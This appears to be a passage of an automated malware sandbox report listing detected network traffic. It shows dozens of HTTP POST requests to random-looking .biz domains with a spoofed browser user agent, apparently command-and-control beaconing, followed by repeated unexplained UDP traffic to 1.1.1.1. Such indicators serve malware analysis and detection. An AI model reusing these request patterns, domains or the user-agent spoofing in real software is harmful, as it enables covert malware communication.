Source: global traffic HTTP traffic detected: POST /bvxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /torfbleb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iqacwcupavovv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /gknotpflubkt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /njk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ljnnvokac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /heowijklptfa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /jt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gerofbpnhxbnel HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /negfyndqat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /twv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /sfduvqthq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /oitokksbsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /rmu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ajqmmfcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /txgdoagkkmvqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /wmyvrothcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dqpygue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ubrpiugbci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qjkfpfdycqfln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /vauoordpmpgaykv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vtk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /jsmhknoucgib HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /udyyttdfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rvwkmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yfqsba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /emfmvfownawowh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dgxlfefuhlec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /txfroxnfrj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ptd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /wm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fuqbdfcow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /binfxyplqyoumy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tkvhoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /dafungtde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tgphsmbcvwmuwmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /nnsajrfcymu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dqxhnesyyna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ghhknbcvfb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /met HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qtbrykoecwonf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /apsbtqhunyqqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /pgnqnbmeojw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /onutm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /rw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sjpfgfxfdnggnnio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /rntyad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /vbngsfyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /isfkmckm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /xc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fwkhevjnywgrfjvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /qqnj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
